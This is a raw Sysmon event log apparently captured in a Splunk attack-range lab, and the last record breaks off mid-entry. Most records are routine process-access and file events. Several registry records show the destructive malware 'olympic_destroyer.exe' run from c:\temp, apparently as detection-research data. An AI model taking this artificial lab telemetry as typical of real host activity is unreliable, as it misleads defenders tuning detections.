10:52:49.042{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.042{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.042{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000217038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:47.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51365-false10.0.1.12-8000- 23542300x8000000000000000217037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C58C276707E5289D3EBFD76A4C705CFB,SHA256=FF94704D57D35C7388318AE5D11BCE2790EE9129BE5A6295AD41786A0C51DB7A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.346{4F8D34B0-1202-6216-6A04-000000003902}34561524C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1202-6216-6A04-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1202-6216-6A04-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.081{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1202-6216-6A04-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:50.082{4F8D34B0-1202-6216-6A04-000000003902}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:50.495{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44DF7114CB387C6D24279AA1F1D6C7AA,SHA256=9C5287A260DE7759DA9341E177D08F84AA526C8EA68712A424156808D15107DC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000289091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDB-VerSetValue2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\REGISTRY\A\{a9294e2d-2a13-2d50-6b48-40240cdc7c1c}\Root\InventoryApplicationFile\olympic_destroye|c03eb4dc0e19bbb8\BinProductVersion(Empty) 13241300x8000000000000000289090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDB-CompileTimeClaimSetValue2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\REGISTRY\A\{a9294e2d-2a13-2d50-6b48-40240cdc7c1c}\Root\InventoryApplicationFile\olympic_destroye|c03eb4dc0e19bbb8\LinkDate12/27/2017 11:39:06 13241300x8000000000000000289089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDB-PubSetValue2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\REGISTRY\A\{a9294e2d-2a13-2d50-6b48-40240cdc7c1c}\Root\InventoryApplicationFile\olympic_destroye|c03eb4dc0e19bbb8\Publisher(Empty) 13241300x8000000000000000289088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDB-PathSetValue2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\REGISTRY\A\{a9294e2d-2a13-2d50-6b48-40240cdc7c1c}\Root\InventoryApplicationFile\olympic_destroye|c03eb4dc0e19bbb8\LowerCaseLongPathc:\temp\olympic_destroyer.exe 924900x8000000000000000289087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\Device\Harddisk0\DR0 924900x8000000000000000289086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:50.095{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exe\Device\HarddiskVolume1 10341000x8000000000000000217052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1203-6216-6B04-000000003902}3184C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217051Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217050Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217049Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217048Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217047Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217046Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:51.518{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217045Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 